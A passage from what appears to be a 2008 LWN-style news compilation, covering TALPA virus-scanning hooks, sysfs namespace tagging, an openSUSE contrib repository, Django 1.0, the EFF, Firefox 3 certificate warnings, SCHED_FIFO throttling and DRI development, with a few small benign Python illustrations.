could be stored in extended attributes (xattrs) of the file or in some
other application-specific database.  In any case, it is not a problem for
the kernel, as Ted Ts'o points out:

I'm just arguing that there should be absolutely *no* support in the
kernel for solving this particular problem, since the question of
whether a file has been scanned with a particular version of the virus
DB is purely a userspace problem.


It is important to keep the scanned status out of kernel purview in order
to ensure that policy decisions are not handled by the kernel itself.  This
is in keeping with the longstanding kernel development principle that user
space should make all policy decisions.  This allows new applications to
come along, ones that were perhaps never envisioned when the feature was
being designed.  For example, Alan Cox describes another reason that the state of the
file with respect to scanning should be kept in user space:

This is another application layer matter. At the end of the day why does
the kernel care where this data is kept. For all we know someone might
want to centralise it or even distribute it between nodes on a clustered
file system.


The latest TALPA design includes an in-memory clean/dirty flag that can
short circuit the blocking read notification (when clean).  That flag gets
set to dirty whenever there is an mtime modification.  This optimizes the
common case of reading a file that hasn't changed.  Further optimizations
are possible down the line as Paris mentions:

If some general xattr namespace is agreed upon for such a thing someday
a patch may be acceptable to clear that namespace on mtime update, but I
don't plan to do that at this time since comparing the timestamp in the
xattr vs mtime should be good enough.
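
The effect of the in-memory clean/dirty flag can be sketched as follows.  Again, this is a simplified Python model under stated assumptions: the Inode class, the function names, and the scan callback are hypothetical and are not taken from the patches.

```python
class Inode:
    def __init__(self, data):
        self.data = data
        self.clean = False  # in-memory only; lost if the inode leaves the cache


def blocking_read(inode, scan):
    """Return the data, calling scan(data) only when the inode is not clean."""
    if not inode.clean:
        if not scan(inode.data):
            raise PermissionError("access denied by scanner")
        inode.clean = True   # later reads can skip the scanner
    return inode.data


def write(inode, data):
    inode.data = data
    inode.clean = False      # an mtime update marks the inode dirty


scan_calls = []

def scan(data):
    scan_calls.append(data)  # record each scan so the savings are visible
    return b"EVIL" not in data


ino = Inode(b"abc")
blocking_read(ino, scan)     # scanned
blocking_read(ino, scan)     # flag is clean, so no scan
write(ino, b"abcd")
blocking_read(ino, scan)     # scanned again after the change
scan_count = len(scan_calls)
```

Three reads result in only two scans; the unchanged file is read the second time without involving the scanner at all.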


Various other uses for the kinds of hooks proposed for TALPA have also come up
in the discussion. Hierarchical storage management, where data is
transparently moved between different kinds of media, might be able to use
the blocking read mechanism. File indexing applications and intrusion
detection systems could use the mtime change notification as well.  This is
a perfect example of kernel development in action; after a rough start,
the TALPA folks have done a much better job working with the
community. 


Some might argue that the kernel development process is somehow suboptimal,
but it is the only way to get things into Linux.  As the earlier adventures
of TALPA would indicate, flouting kernel tradition is likely to go
nowhere.  While it is still a long way from being included—pesky
things like working code are still needed—it is clearly on a path to
get there some day, in one form or another.


		Sysfs and namespaces


Support for network namespaces - allowing different groups of processes to
have a different view of the system's network interfaces, routes, firewall
rules, etc. - is nearing completion in recent kernels.  A look at
net/Kconfig turns up something interesting, though: network
namespaces can only be enabled in kernels which do not support sysfs - the
two are mutually exclusive.  Since most system configurations need sysfs to
work properly, this limitation has made it harder than it would otherwise
be to use, or even test, the network namespace feature.

The problem is simple: the network subsystem creates a sysfs directory for
each network interface on the system.  For example, eth0 is
represented by /sys/class/net/eth0; therein one can find out just
about anything about how eth0 is configured, query its packet
statistics, and more.  But, when network namespaces are in use, one group
of processes may have a different eth0 than another, so they
cannot share a globally-accessible sysfs tree.  One solution might be to
add the network namespace as an explicit level in the sysfs tree, but that
would break user-space tools and fails to properly isolate namespaces from
each other.  The real solution is to build namespace awareness more deeply
into sysfs.


Eric Biederman has been working on a set of sysfs namespace patches for the
last year or so; those patches now appear to be getting close to ready for
inclusion into the mainline.  Network namespaces will be the first user of
this feature, but it has been written in a way that makes it possible for
any system namespace to provide differing views of parts of the sysfs
hierarchy.


The core concept is that of a "tagged" directory in sysfs.  Any sysfs
directory can be associated with (at most) one type of tag, where that type
identifies which type of namespace controls how that directory is viewed.
Thus, for example, /sys/class/net would have a tag type
identifying the network namespace subsystem as the one which is in control
there.  The /sys/kernel/uids directory, instead, will be managed
by the user namespace subsystem.
Once a directory is given a tag type, all subdirectories and
attribute files inherit the same type.

Namespace code makes use of tagged sysfs directories by adding an entry to
enum sysfs_tag_type, defined in <linux/sysfs.h>, to
identify its specific tag type.
The namespace must also create an operations structure:


The purpose of the mount_tag() method is to return a specific tag
(represented by a void * pointer) for the current
process.  This tag, normally, will just be a pointer to the structure
describing the relevant namespace; for example, network namespaces
implement this method as follows:


The tag operations must be registered with sysfs using:


Thereafter, there are two ways of associating tags with a sysfs hierarchy.
One of those is to make a tagged directory directly with:


The directory associated with kobj will have differing contents
depending on the value of the tag of the given type.  The actual
tag associated with the contents of this directory will be determined (at
creation time) by calling a new function added to the kobj_type
structure:


The sysfs_tag() function is usually a short series of
container_of() calls which, eventually, locates the appropriate
namespace for the given kobj.

An alternative way to attach tags to a directory tree is to associate it
directly with the class structure.  To that end, struct
class has two new members:


When the class is instantiated, it will have tags of the given
tag_type; the specific tag for a given class will be found by
calling the sysfs_tag() function.

Finally, if a specific tag ceases to be valid (because the associated
namespace is destroyed, normally), a call should be made to:


This call will cause all sysfs directories with the given tag to
become invisible, and to be deleted when it is safe to do so.
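
To make the tagged-directory idea concrete, here is a toy Python model.  It is not kernel code and does not reproduce the patch set's C interface; the TaggedDir class, its method names, and the namespace names are assumptions chosen to mirror the concepts described above (a per-process tag lookup, per-tag contents, and a tag going away).

```python
class TaggedDir:
    """Toy model of a directory whose contents depend on the viewer's tag."""

    def __init__(self, mount_tag):
        self.mount_tag = mount_tag  # callable returning the caller's tag
        self.entries = {}           # tag -> set of entry names

    def add(self, tag, name):
        self.entries.setdefault(tag, set()).add(name)

    def listdir(self):
        # Only entries carrying the current process's tag are visible.
        return sorted(self.entries.get(self.mount_tag(), ()))

    def exit_tag(self, tag):
        # The namespace is gone: its entries become invisible.
        self.entries.pop(tag, None)


# "current" stands in for the per-process namespace pointer.
current = {"netns": "init_net"}
net = TaggedDir(lambda: current["netns"])

net.add("init_net", "eth0")
net.add("init_net", "lo")
net.add("container_net", "eth0")    # a different eth0 in another namespace

view_init = net.listdir()           # ['eth0', 'lo']
current["netns"] = "container_net"
view_container = net.listdir()      # ['eth0']
net.exit_tag("container_net")
view_after_exit = net.listdir()     # []
```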

Adding tagged directory support requires some significant changes to the
sysfs code.  But the interface has been designed to make it very easy for
other subsystems to make use of tagged directories; it's a simple matter of
providing functions to return the specific tag values which should be
used.  At this point, the biggest challenge might be making sense of sysfs
when its contents may be different for each observer.  But that is a
challenge associated with namespaces in general.

		A new "contrib" repository for openSUSE


There has been a recent discussion on the opensuse-factory mailing list
about the creation of a repository for non-core packages. The concern
expressed at the beginning of the discussion is that openSUSE has too many
repositories of unknown quality.  Right now many openSUSE community
members have home repositories with software packages not found in the
main openSUSE repository.  Some have software that other openSUSE users
would like, some have highly experimental packages that most users would
rather avoid.  It is difficult for the user to find the packages they want,
or know which ones they might find suitable. Pascal
Bleser expressed some of those concerns:


The goal of the contrib repository must indeed be "stability", which
essentially means two things:
- - feature freeze: when the Factory repository is freezed, the contrib
repository must be freezed too; only allow bugfix upgrades (as, clearly,
I doubt we'd find enough human resources to backport fixes) and reject
feature upgrades
- - stable software: packages that are in there need a lot of testing and
must hence be picked carefully

The point is to make an "additional" type of repository,
not an "always the latest".

And then we should think about how to have those packages tested
properly in order to gain an acceptable level of quality in there when
openSUSE distro releases happen (or, rather, when they're freezed).
Following the alpha/beta/RC cycles of Factory and issue the same calls
for testing could be an option.


Alexey
Eromenko had some ideas of what that might look like:


Yes, "Contrib" is planned to be a community-driven extension of Factory,
with all Factory  standards and limits applied.

This means, that user's will have early version of contrib available
for 11.1. "early" doesn't mean unstable, but it means that number of
packages are expected to be limited.

Only stable software will make it into contrib.
All unstable software will remain in user's Home projects in OBS.


Pascal
Bleser wondered about how a package is determined to be stable.


Yes, sure, but => "after it becomes stable" <=
That's precisely the point. How do we decide whether a package is stable
enough to go into contrib ?
Through a release management team ?
But maybe we need to offer a comfortable way for people to test packages
before they make it into contrib, and having a staging repository is one
way of doing it.
(I'm just throwing ideas, I'm not saying it's necessarily _the_ way to
do it)


Richard
Guenther proposed some sort of staging repository.


It as well makes sense to stage Contrib (I would like this for Factory,
too, but it's probably easiest to try with Contrib first). If you
are familiar with the Debian way then you know there is the unstable
and the testing repositories. So there should be something like
Contrib:/Unstable (feel free to pick a more suitable name) where
a new package (version) should reside for some time before it is
migrated to the main Contrib repository. Criterias ideally would be
"zero bugs of severity greater than normal" - but of course this
would require proper bugzilla integration (or completely manual
migration).

Staging Contrib helps getting more peer review and avoids breaking
Contrib itself. At the point the next openSUSE is freezed development
can continue in the unstable branch but only critical fixes are
migrated to Contrib.


Alexey
Eromenko suggested that the new repository should have stable versioned branches,
but unstable packages should remain in Home repositories.


Speaking about stable/unstable trees:
-I think that stable must have braches, yes, (contrib-stable-11.1,
contrib-stable-11.2, etc...) - but only for future releases, not
backports.
Reason is simple: We will find BETA-testers for 11.1/11.2, but
unlikely to find enough testers for packages for 10.2.

-unstable: I prefer this branch should exists in user's OBS, but if
there are volunteers,
it could be part of contrib. Because it is unstable, I don't think it
needs branching.


The discussion continued from there.  For now, unstable packages remain in
the user's Home repository and a small review team has been formed to
review these potential candidates.  The discussion and its results have been
documented on the Contrib
wiki page, along with a wish list of packages, for those who
are interested in learning more about the Contrib repository and the shape
it might take.

		Django nears 1.0 milestone


The Django web application
framework is nearing an important milestone: version 1.0.  Like Ruby on
Rails, TurboGears, and others, Django is meant to streamline 
application development for the web by providing easy-to-use libraries for
tasks that 
are commonly performed by dynamic web sites, such as database access and
HTML templating.  The Django project has just released
the second beta of the 1.0 release, with the final release due in early
September. 


Django is Python-based, with an eye towards getting an application—or
the beginnings of one—up and running quickly.  The framework is quite
"Pythonic", so it will be very accessible to those used to programming in
that language.  Django also has an extensive set of
documentation including an on-line (and dead tree) book. 


While Django can be used to build nearly any kind of web site, it has a
"sweet spot" that is well described in the introduction to The
Django Book:

Because Django was born in a news environment, it offers several features
(particularly its admin interface, covered in Chapter 6) that are
particularly well suited for "content" sites – sites like eBay,
craigslist.org, and washingtonpost.com that offer dynamic, database-driven
information. (Don't let that turn you off, though – although Django is
particularly good for developing those sorts of sites, that doesn't
preclude it from being an effective tool for building any sort of dynamic
Web site. There's a difference between being particularly effective at
something and being ineffective at other things.)


The database abstraction (or model) layer is at the heart of what Django
provides to a programmer.  Most dynamic web sites use some kind of
database, so Django supports multiple, popular database systems, of both free
software and commercial varieties.  Because the model layer is a high-level
description of the data, moving from one database backend to another is
greatly simplified.  In addition, the flexibility of the model API means
that many applications can do all of the queries that they need without
ever descending into SQL—though the facility is there if it is needed.


An example taken from the book nicely illustrates the simplicity of
Django's model API:

From this information, along with some configuration concerning database
type and name, Django can generate and execute the appropriate SQL to build a
database table to store a Book.  As fields get added and removed from the
model, the proper commands to synchronize the model and the database can be
generated.  From application code (i.e. the "view" code), then, models can
be used in various ways, for instance:

This can then be used in an HTML template as follows:


That is, of course, a simple example (and it lacks the URL mapping piece),
but it gives a flavor of the power 
that Django provides.  It is also an example that most folks, even
non-programmers, can follow to some extent.  Like many
model-view-controller (MVC) based frameworks, Django splits up the various
pieces of functionality in an attempt to break the coupling between the
user interface, "business" logic, and data storage, allowing each to be
worked on separately.  In particular, the template language is meant to be
used by web page designers who have little programming background. 
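
The idea of generating a database table from a high-level description of the data can be illustrated without Django at all.  The following sketch uses only Python's standard sqlite3 module; it is not Django's implementation or API, and the field names, column types, and sample row are invented for the example.

```python
import sqlite3

# Hypothetical description of a "book" model: column name -> SQL type.
BOOK_FIELDS = {
    "title": "VARCHAR(100)",
    "author": "VARCHAR(100)",
    "published": "DATE",
}


def create_table_sql(table, fields):
    """Build a CREATE TABLE statement from a field description."""
    # An integer primary key is added automatically, as many frameworks do.
    cols = ['"id" INTEGER PRIMARY KEY']
    cols += [f'"{name}" {sqltype}' for name, sqltype in fields.items()]
    return f'CREATE TABLE "{table}" ({", ".join(cols)})'


conn = sqlite3.connect(":memory:")
conn.execute(create_table_sql("book", BOOK_FIELDS))
conn.execute(
    'INSERT INTO "book" (title, author, published) VALUES (?, ?, ?)',
    ("Example Title", "A. Author", "2008-01-01"),
)
titles = [row[0] for row in conn.execute('SELECT title FROM "book"')]
```

A real framework adds much more (type mapping per backend, relations, migrations), but the division of labor is the same: the application describes the data once and the SQL is derived from that description.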


One of the nicer features is the automatically generated administrative
interface.  Many web frameworks have incorporated an easy way for a site
administrator to start entering data into their models.  This allows
developers to get their application running quickly with real data
without having to code up a bunch of tedious data entry forms.  One
of the bigger changes between the current 0.96 Django release and the upcoming
1.0 is a complete overhaul of this interface.


Many developers have been using the development versions of Django from the
subversion repository because the released version (which is what is
packaged by distributions) has lagged.  There are a number of
backward-incompatible changes since 0.96 and the documentation is geared
towards the 1.0 version (though it should be noted that versions for each
of the last two releases are also readily available).  Stabilizing the API
has been the driving force behind the 1.0 release.  Going forward,
compatibility will be maintained unless a security or other
serious problem is found.


Django has numerous other interesting features: authentication, session
handling, and a caching system
that is geared towards scalability.  It is also fully ready for 
internationalization, with "full support for multi-language
applications, letting you specify translation strings and providing hooks
for language-specific functionality." 


Due to be released on September 2, just in time for DjangoCon, 1.0 is, unsurprisingly, both
feature and "string" frozen—only serious bug fixes are still going
in.  Like other projects, including Python itself, Django is "governed" by
an independent foundation; 
the newly formed Django
Software Foundation in this case.  The original developers of Django are still
active both as foundation board members and as developers (and
users) of Django.


There are lots of web frameworks to choose from, in nearly every computer
language used today—though none for COBOL as far as we have
heard—so Django is just "yet another" web framework at some level. 
Django does have some things going for it that others may lack: a
development community that is active and uses the framework (generally the
development version checked out of
the subversion repository) for live,
high-volume sites, excellent documentation, and a well thought-out design.
For anyone looking for a Python-based web application framework, at least
taking Django for a spin will be time well spent.


		EFF continues fight for rights and freedoms


There's little doubt that emerging technology is improving our way of
life, but it's also creating a quagmire of legal issues surrounding the
rights and restrictions we face while living in a digital age. The once
ambiguous concept of "digital rights" has now become an all-encompassing term
used to designate a wide range of rights that have the potential to be
trampled on as courts sort out how Constitutional freedom applies to
emerging and existing technologies.
LWN recently chronicled
GeekPAC, an organization looking for new ways   
to protect our rights via the political battlefront. The Electronic Frontier Foundation (EFF), one of
the oldest non-profit organizations dedicated to establishing and defending
our rights in a digital world, takes a different approach.  

Since the EFF's mission encompasses such a large body of issues, it's no
longer practical to say they're protecting "digital rights." Rebecca
Jeschke, Media Relations Coordinator for the EFF, says, "Instead, in our
increasingly networked world, they are simply 'rights.'  But we'll continue
to educate folks on the issues." To do so, the EFF focuses its
energies on 
several important issues including
free speech, intellectual property, privacy, and innovation. At first
blush, it may be easy to dismiss the work they do as something that only
applies to people who download music illegally or who need to protect their
online content from thieves. In fact, it may surprise some people to know
that the EFF also defends the privacy of airline travelers and cell phone
users, issues not typically associated with the purveyors of digital
freedoms. 

One of the reasons the EFF's reach is so wide is the way
technology infiltrates our everyday lives. It's easy to understand why
sharing the contents of a store-bought music CD with hundreds of people on
the Internet may infringe on the rights of the artist hoping to sell his
music. In the case of an airline traveler, rights infringement takes on a
completely new form when the Transportation Security Administration's data
analysis and screening software wrongly decides someone is a security
risk. Not only is there no way to challenge the error, it's a mistake
that's likely to haunt them for the rest of their lives. 

The more pervasive technology becomes, the more stories of this nature
arise. Take, for example, the seemingly innocuous library
book. Many public and school libraries are employing RFID technology to track books
and other borrowed items. People throw these books into their bag or
backpack without realizing the affixed tracking tags can actually be used
to track 
them as well. It's doubtful the government would be interested in
the whereabouts of a 9-year-old walking home from school, but it's easy to
see how this technology can be mishandled or abused. 

To be sure, no one is suggesting that technology be removed from our
daily lives. The mission of the EFF and its supporters is to effect
accountability and protect people's rights within the courts. 

Jeschke says one of the biggest battles surrounding digital freedom that
we're likely to hear about in the next year or so is the issue of coders'
rights. In response to a gradual uptick of cases in which coders, software
engineers, and computer science students are being falsely accused of
hacking and other nefarious crimes, the EFF has developed the Coders' Rights Project.  

According to the EFF, coders are becoming reluctant to explore and
research ways to make our technology safer for fear of being prosecuted
under laws like the Digital Millennium Copyright Act (DMCA) and the
Computer Fraud and Abuse Act. The Coders' Rights Project protects
researchers through "education, legal defense, amicus briefs and
involvement in the community with the goal of promoting innovation and
safeguarding the rights of curious tinkerers and hackers on the digital
frontier." 

Jeschke says another big issue to watch involves the National Security
Agency (NSA) and its interest in wiretapping phones and
email without first obtaining a court order. Though such wiretapping has
been expressly illegal since 1978, President George W. Bush authorized the
NSA to proceed anyway; when the news became public in 2005, the EFF immediately sprang into
action against the telecommunications companies assisting the government
with their illegal practice. Congress passed an amendment of the original
law that grants telecommunications companies immunity, and the EFF is
currently working to have 
that law repealed.  

Other issues of importance in the upcoming months are expected to be in
the area of copyright and fair 
use in user-generated content. The proliferation of YouTube and other
online video hosting sites is creating a new and exciting level of
creativity, along with some cinema screen-sized headaches about how content
owned by others is permitted to be used.

For example, a homegrown animated video of original content is fine to
post online. Setting that video to a favorite Rolling Stones song, however,
crosses the line into copyright infringement. Or does it?  What if the main
character is simply wearing a t-shirt bearing the band's hand-drawn logo?
These are some of the issues the EFF is hoping to sort out.  

As a non-profit organization, the EFF is funded solely through
individual and corporate donations. In fact, a full two-thirds
of the foundation's operating budget comes from individual donations, much
of which is funneled directly into litigation. 

The EFF's status as a charitable organization does not permit the
solicitation of politicians and governmental figures to support its
cause. Instead, the foundation fights legal battles in court, advises
policymakers, and uses its corps of 50,000 volunteers to educate the
public.   

One such EFF contributor is SourceForge.net Community Manager Ross Turk,
who has been donating consistently to the EFF for 3 years and has been a
staunch supporter for much longer.  He says:

I think the world is changing. Technology has made things possible now
that weren't possible before, but I think the system has become highly
motivated to preserve itself by making sure people don't do things in new
and interesting ways. The EFF's mission is, as I see it, to help the system
adapt to the world that we live in today by forcing it to take a closer
look at the way it deals with patents, the limitless power it grants
industry, and the way it views free speech in an online age. 

I like that they protect the world's innovators, and I like that they
thwart those who try to use the technology we have created to monitor and
control us.  I'm also very happy to know that they're
there to help us protect members of our community who are attacked for
doing what they like to do. 


Turk also notes that EFF
Bootcamp, a one-day training session presented by the foundation's
attorneys, has benefited him professionally because it helped him
"understand the difference between enforcement and oppression." 

It's precisely that kind of education that has kept the EFF going strong
for 18 years. The first step in protecting our rights in the burgeoning age
of technology is to understand how the things we invent and rely on have
the potential to impact our freedoms. 


		Firefox 3 SSL certificate warnings


Users of Firefox 3 have likely seen the new warnings for various
"invalid" SSL certificates.  Compared with those in earlier versions of
Firefox, the new warnings are much scarier, as well as more difficult to
ignore; clicking through to the web site is decidedly more
time-consuming.  This is exactly as the Mozilla folks intend, but it has raised
some eyebrows, and ire, amongst site owners and Firefox users.


SSL certificates are used to enable encrypted communication (i.e. https)
between browsers and web sites.  Web site owners generate a public and
private key for use in the encryption. The public key gets wrapped up in an
X.509 certificate and must be signed by someone.  For larger sites, it is
typically a certificate authority (CA) that signs the certificate, but that
generally costs money.  Many smaller sites will sign their own certificate,
creating what is known as a self-signed certificate.


As part of the negotiation of an encrypted connection, a web site will
present its certificate to the browser.  In order to prevent
man-in-the-middle attacks against the encrypted connection, the browser
needs to verify that the certificate belongs to the web site it believes it
is talking to.  It does that by verifying the signature of the CA.


A signature can only be verified if the browser has the public key of the
CA that has signed the certificate.  Because there are a multitude of CAs,
a "web of trust" is established whereby a number of root CAs sign the
certificate of lesser CAs, who might in turn sign for other CAs.  A browser
developer, like Mozilla, chooses a set of root certificates that they
trust.  When verifying the certificate from some random website, the
browser follows the signature chain; if it reaches one of their root
certificates, the web site certificate is valid.  A self-signed certificate
will, of course, fail this test.
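
The chain-following check described above can be modelled in a few lines of Python. This is only a sketch of the shape of the chain: a real browser verifies a cryptographic signature at every step, and the site and CA names below are hypothetical.

```python
def chains_to_trusted_root(subject, issuer_of, trusted_roots, max_depth=10):
    """Follow issuer links from `subject`; return True if a trusted root is reached.

    `issuer_of` maps each certificate's subject to the name of its signer.
    No cryptography is performed; only the structure of the chain is modelled.
    """
    current = subject
    for _ in range(max_depth):
        if current in trusted_roots:
            return True
        issuer = issuer_of.get(current)
        if issuer is None or issuer == current:
            # Unknown signer, or a self-signed certificate that is not a root.
            return False
        current = issuer
    return False  # chain too long (or circular); give up


# Hypothetical certificates, for illustration only.
issuer_of = {
    "shop.example": "Lesser CA",
    "Lesser CA": "Root CA",
    "Root CA": "Root CA",            # roots sign themselves
    "blog.example": "blog.example",  # self-signed site certificate
}
trusted_roots = {"Root CA"}

if __name__ == "__main__":
    for site in ("shop.example", "blog.example"):
        print(site, chains_to_trusted_root(site, issuer_of, trusted_roots))
```

The self-signed site fails because its chain ends at itself rather than at one of the browser's chosen roots.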


When a user comes across a site that has such a certificate, Firefox 3 puts
up a nasty warning.  The images that accompany this article are screenshots
of the warning, along with two of the three steps one must take to accept
the certificate.  They were generated by visiting https://bugzilla.gnome.org.  The days
of a single pop-up message that could easily be clicked through are long gone.


There are a few different issues here.  To start with, there are a large
number of legitimate sites that have self-signed certificates.  In order to
access those sites, users are being trained to click through a series of
dialogs and scary ("Legitimate banks, stores, and other public sites
will not ask you to do this") warnings, just as they were trained to
do with the single pop-up message in earlier Firefox versions.


Mozilla's position
is that self-signed certificates are untrustworthy: not necessarily
invalid, but not something that the browser can trust without asking
the user.  Because most users are not very sophisticated, the warnings need
to be detailed and somewhat frightening.  The problem is that users of all
kinds may get annoyed by the dialogs—then train themselves to
essentially ignore them.


Because there are CAs, like StartSSL, that provide free certificate
signing (as well as others that cost less than $20/year), Mozilla is
clearly trying to push web sites into moving away from self signing.  There
is a risk of man-in-the-middle attacks from self-signed certificates
because anyone can create a certificate that purports to be for any other
given web site.  To some extent, though, the level of danger depends on
what the encryption 
is trying to protect.


For sites that do e-commerce or transmit and receive sensitive information,
there is no question that a CA-signed certificate is required.  There are
other reasons to encrypt traffic, though, including evading deep packet inspection (DPI), where
the risks of accepting a bogus certificate are relatively low.  One might
get ads 
injected into their web browser inappropriately—annoying, but hardly
fatal. 


There is no simple solution.  Mozilla is erring on the side of caution by
trying to protect its users while still allowing them to override its
protections.  Other techniques, possibly like the Perspectives
Firefox extension, may help alleviate the problem in the long term.  Until
then, we may have to just grit our teeth and click our way past the
multiple warnings.


		SCHED_FIFO and realtime throttling


The SCHED_FIFO scheduling class is a longstanding, POSIX-specified realtime
feature.  Processes in this class are given the CPU for as long as they
want it, subject only to the needs of higher-priority realtime
processes.  If there are two SCHED_FIFO processes with the same priority
contending for the CPU, the process which is currently running will
continue to do so until it decides to give the processor up.  SCHED_FIFO is
thus useful for realtime applications where one wants to know, with great
assurance, that the highest-priority process on the system will have full
access to the processor for as long as it needs it.
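
For readers who have not used the class, the following is a minimal user-space sketch of how a process might request SCHED_FIFO. It uses Python's os module wrappers for the POSIX scheduling calls; the helper name try_sched_fifo() is made up for this example, and the request will normally be refused unless the process has realtime privileges.

```python
import os


def try_sched_fifo(priority=None):
    """Try to switch the calling process to SCHED_FIFO, then switch back.

    Returns True if the kernel granted the request, False if it was refused
    (typically because the process lacks the needed privilege).
    """
    if priority is None:
        priority = os.sched_get_priority_min(os.SCHED_FIFO)
    # Remember the current policy so it can be restored afterward.
    old_policy = os.sched_getscheduler(0)
    old_param = os.sched_getparam(0)
    try:
        os.sched_setscheduler(0, os.SCHED_FIFO, os.sched_param(priority))
    except OSError:
        return False
    # Go back to the previous class right away so that this demonstration
    # cannot monopolize the CPU.
    os.sched_setscheduler(0, old_policy, old_param)
    return True


if __name__ == "__main__":
    low = os.sched_get_priority_min(os.SCHED_FIFO)
    high = os.sched_get_priority_max(os.SCHED_FIFO)
    print(f"SCHED_FIFO priorities: {low}..{high}")
    print("SCHED_FIFO granted:", try_sched_fifo())
```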

One of the many features merged back in the 2.6.25 cycle was realtime group
scheduling.  As a way of balancing CPU usage between competing groups of
processes, each 
of which can be running realtime tasks, the group scheduler introduced the
concept of "realtime bandwidth," or rt_bandwidth.  This bandwidth consists
of a pair of values: a CPU time accounting period, and the amount of CPU
that the group is allowed to use - at realtime priority - during that
period.  Once a SCHED_FIFO task causes a group to exceed its rt_bandwidth,
it will be pushed out of the processor whether it wants to go or not.

This feature is required if one wants to allow multiple groups to split a
system's realtime processing power.  But it also turns out to have its uses in
the default situation, where all processes on the system are contained
within a single, default group.  Kernels
shipped since 2.6.25 have set the rt_bandwidth value for the default group
to be 0.95 out of every 1.0 seconds.  In other words, the group scheduler
is configured, by default, to reserve 5% of the CPU for non-SCHED_FIFO
tasks.
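
The arithmetic behind that 5% figure can be sketched as follows. The article does not say how the values are exposed to user space; this example assumes the sched_rt_period_us and sched_rt_runtime_us files under /proc/sys/kernel found in mainline kernels, and simply skips the live reading if they are absent.

```python
def reserved_fraction(period_us, runtime_us):
    """Fraction of each accounting period left for non-realtime tasks."""
    if runtime_us < 0:  # a negative runtime means "no limit" on realtime use
        return 0.0
    return (period_us - runtime_us) / period_us


def read_sysctl_int(name):
    """Read an integer from /proc/sys/kernel/<name>, or None if unavailable."""
    try:
        with open(f"/proc/sys/kernel/{name}") as f:
            return int(f.read().strip())
    except (OSError, ValueError):
        return None


if __name__ == "__main__":
    # The default described in the text: 0.95 out of every 1.0 seconds.
    print(f"default: {reserved_fraction(1_000_000, 950_000):.0%} reserved")
    period = read_sysctl_int("sched_rt_period_us")
    runtime = read_sysctl_int("sched_rt_runtime_us")
    if period and runtime is not None:
        print(f"this system: {reserved_fraction(period, runtime):.0%} reserved")
```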


It seems that nobody really noticed this feature until mid-August, when
Peter Zijlstra posted a patch which set the
default value to "unlimited."  At that point it became clear that some
developers have a different idea about how this kind of policy should be
set than others do.

Ingo Molnar disagreed with the patch,
saying:


	The thing is, i got far more bugreports about locked up RT tasks
	where the lockup was unintentional, than real bugreports about
	anyone _intending_ for the whole box to come to a grinding halt
	because a high-prio RT tasks is monopolizing the CPU.


Ingo's suggestion was to raise the limit to ten seconds of CPU time.  As he
(and others) pointed out: any SCHED_FIFO application which needs to
monopolize the CPU for that long has serious problems and needs to be
fixed.

There are real problems associated with letting a SCHED_FIFO process run
indefinitely.  Should that process never get around to relinquishing the
CPU, the system will simply hang forevermore; there is no possibility of
the administrator slipping in with a kill command.  This process
will also block important things like kernel threads; even if it releases
the processor after ten seconds, it will have seriously degraded the
operation of the rest of the system.  Even on a multiprocessor system,
there will typically be processes bound to the CPU where the SCHED_FIFO
process is running; there will be no way to recover those processes without
breaking their CPU affinity, which is not a step anybody wants to take.

So, it is argued, the rt_bandwidth limit is an important safety breaker.
With it in place, even a runaway SCHED_FIFO process cannot prevent the
administrator from (eventually) regaining control of the system and
figuring out what is going on.  In exchange for this safety, this feature
only robs SCHED_FIFO tasks of a small amount of CPU time - the equivalent
of running the application on a slightly weaker processor.

Those opposed to the default rt_bandwidth limit cite two main points: it is
a user-space API change (which also breaks POSIX compliance) and
represents an imposition of policy by the kernel.  On the first point, Nick
Piggin worries that this change could lead
to broken applications:


	It's not common sense to change this. It would be perfectly valid
	to engineer a realtime process that uses a peak of say 90% of the
	CPU with a 10% margin for safety and other services. Now they only
	have 5%.
	
	Or a realtime app could definitely use the CPU adaptively up to
	100% but still unable to tolerate an unexpected preemption.


What could make the problem worse is that the throttle might not cut in
during testing; it could, instead, wait until something unexpected comes up
in a production system.  Needless to say, that is a prospect which can
prove scary for people who create and deploy this kind of system.

The "policy in the kernel" argument was mostly shot down by Linus, who pointed out that
there's lots of policy in the kernel, especially when it comes to the
default settings of tunable parameters.  He says:


	And the default policy should generally be the one that makes sense
	for most people. Quite frankly, if it's an issue where all normal
	distros would basically be expected to set a value, then that value
	should _be_ the default policy, and none of the normal distros
	should ever need to worry.


Linus carefully avoided taking a position on which setting makes sense for
the most people here.  One could certainly argue that making systems
resistant to being taken over by runaway realtime processes is the more
sensible setting, especially considering that there is a certain amount of
interest in running scary applications like PulseAudio with realtime priority.
On the other hand, one can also make the case that conforming to the
standard (and expected) SCHED_FIFO semantics is the only option which makes
sense at all.

There has been
some talk of creating a new realtime scheduling class with throttling being
explicitly part of its semantics; this class could, with a suitably low
limit, even be made available to unprivileged processes.
Meanwhile, as of this writing, the 0.95-second limit - the one option that
nobody seems to like - remains unchanged.  It will almost certainly
be raised; how much is something we'll have to wait to see.

		DRI, BSD, and Linux


The Direct Rendering
Infrastructure project has long been working toward improved 3D
graphics support in free operating systems.  It is a crucial part of the
desktop Linux experience, but, thus far, DRI development has been done in
a relatively isolated manner.  Development process changes which have the potential
to make life better for Linux users are in the works, but, sometimes,
that's not the only thing that matters.


The DRI project makes its home at freedesktop.org.  Among other
things, the project maintains a set of git repositories representing
various views of the current state of DRI development (and the direct
rendering manager (DRM) work in particular).  This much is not unusual;
most Linux kernel subsystems have their own repository at this point.  The
DRM repository is different, though, in that it is not based on any Linux
kernel tree; it is, instead, an entirely separate line of development.


That separation is important; it means that its development is almost
entirely disconnected from mainline kernel development.  DRM patches going
into the kernel must be pulled out of the DRM tree and put into a form
suitable for merging, and any changes made within the kernel tree must be
carefully carried back to the DRM tree by hand.  So this work is not just
an out-of-tree project; it's an entirely separate project producing code
which is occasionally turned into a patch for the Linux kernel.  It is
not surprising that DRM and the mainline tend not to follow each other
well.  As Jesse
Barnes put it recently:


	Things are actually worse than I thought.  There are some fairly
	large differences between linux-core and upstream, some of which
	have been in linux-core for a long time.  It's one thing to have an
	out-of-tree development process but another entirely to let stuff
	rot for months & years there.


The result of all this has been a lot of developer frustration, trouble getting code merged, concerns that the
project is hard for new developers to join, and more.  As the DRM
developers look to merge more significant chunks of code (GEM, for example), the pressure
for changes to the development process has been growing.
So Dave Airlie's recent announcement
of a proposed new DRM development process did not entirely come as a
surprise.  There are a number of changes being contemplated, but the core
ones are these:


 The DRM tree will be based on the mainline kernel, allowing for the 
     easy flow of patches in both directions.  The old tree will be no
     more.

 A more standard process for getting patches to the upstream kernel
     will be adopted; it will include standard techniques like topic
     branches and review of patches on the relevant mailing lists.

 Users of the DRM interface will not ship any releases depending on DRM
